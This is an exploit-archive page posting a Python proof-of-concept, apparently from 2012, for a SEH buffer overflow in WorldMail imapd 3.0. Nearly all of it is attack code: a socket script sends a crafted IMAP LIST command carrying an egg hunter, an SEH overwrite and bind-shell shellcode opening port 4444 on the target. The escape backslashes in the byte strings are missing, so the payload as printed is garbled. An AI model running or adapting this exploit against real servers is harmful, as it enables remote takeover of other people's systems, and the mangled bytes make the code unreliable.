Home / exploits WorldMail imapd 3.0 SEH Overflow
Posted on 13 January 2012
#!/usr/bin/python import sys import socket ## Exploit Title: WorldMail imapd 3.0 SEH overflow (egg hunter) ## Tested on: XP SP3 en-us ## Author: TheXero ## Website: www.thexero.co.uk ## http://www.nullsecurity.net ## Check for parameters if len(sys.argv) != 3: print "Usage: " + sys.argv[0] + " 127.0.0.1 143" quit() ## Assigns the parameters target = sys.argv[1] port = int(sys.argv[2]) ## Sets up the socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ## Sets the variables char = "}" nseh = "xebx06x90x90" seh = "x4ex3bx01x10" ## 10013B4E |. 59 POP ECX mailcmn.dll buffer = 'x90' * 8 shellcode = ("T00WT00W" ## Bindshell port 4444 "xbdxe8x39x05xa5xdbxdbxd9x74x24xf4x58x29xc9xb1" "x56x31x68x13x03x68x13x83xc0xecxdbxf0x59x04x92" "xfbxa1xd4xc5x72x44xe5xd7xe1x0cx57xe8x62x40x5b" "x83x27x71xe8xe1xefx76x59x4fxd6xb9x5ax61xd6x16" "x98xe3xaax64xccxc3x93xa6x01x05xd3xdbxe9x57x8c" "x90x5bx48xb9xe5x67x69x6dx62xd7x11x08xb5xa3xab" "x13xe6x1bxa7x5cx1ex10xefx7cx1fxf5xf3x41x56x72" "xc7x32x69x52x19xbax5bx9axf6x85x53x17x06xc1x54" "xc7x7dx39xa7x7ax86xfaxd5xa0x03x1fx7dx23xb3xfb" "x7fxe0x22x8fx8cx4dx20xd7x90x50xe5x63xacxd9x08" "xa4x24x99x2ex60x6cx7ax4ex31xc8x2dx6fx21xb4x92" "xd5x29x57xc7x6cx70x30x24x43x8bxc0x22xd4xf8xf2" "xedx4ex97xbex66x49x60xc0x5dx2dxfex3fx5dx4exd6" "xfbx09x1ex40x2dx31xf5x90xd2xe4x5axc1x7cx56x1b" "xb1x3cx06xf3xdbxb2x79xe3xe3x18x0cx23x2ax78x5d" "xc4x4fx7ex70x48xd9x98x18x60x8fx33xb4x42xf4x8b" "x23xbcxdexa7xfcx2ax56xaex3ax54x67xe4x69xf9xcf" "x6fxf9x11xd4x8exfex3fx7cxd8xc7xa8xf6xb4x8ax49" "x06x9dx7cxe9x95x7ax7cx64x86xd4x2bx21x78x2dxb9" "xdfx23x87xdfx1dxb5xe0x5bxfax06xeex62x8fx33xd4" "x74x49xbbx50x20x05xeax0ex9exe3x44xe1x48xbax3b" "xabx1cx3bx70x6cx5ax44x5dx1ax82xf5x08x5bxbdx3a" "xddx6bxc6x26x7dx93x1dxe3x8dxdex3fx42x06x87xaa" "xd6x4bx38x01x14x72xbbxa3xe5x81xa3xc6xe0xcex63" "x3bx99x5fx06x3bx0ex5fx03") ## Calculates the size of junk depending on the shellcode junk = "x41" * (769 - len(shellcode)) ## Egg Hunter hunter = ("x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05" "x5ax74xefxb8x54x30x30x57x8bxfaxafx75xeaxafx75xe7xffxe7") ## Assembles the buffer buffer = char + junk + shellcode + nseh + seh + hunter + char ## Connects s.connect((target,port)) data=s.recv(1024) s.send("a001 LIST " + buffer + " ") s.close()
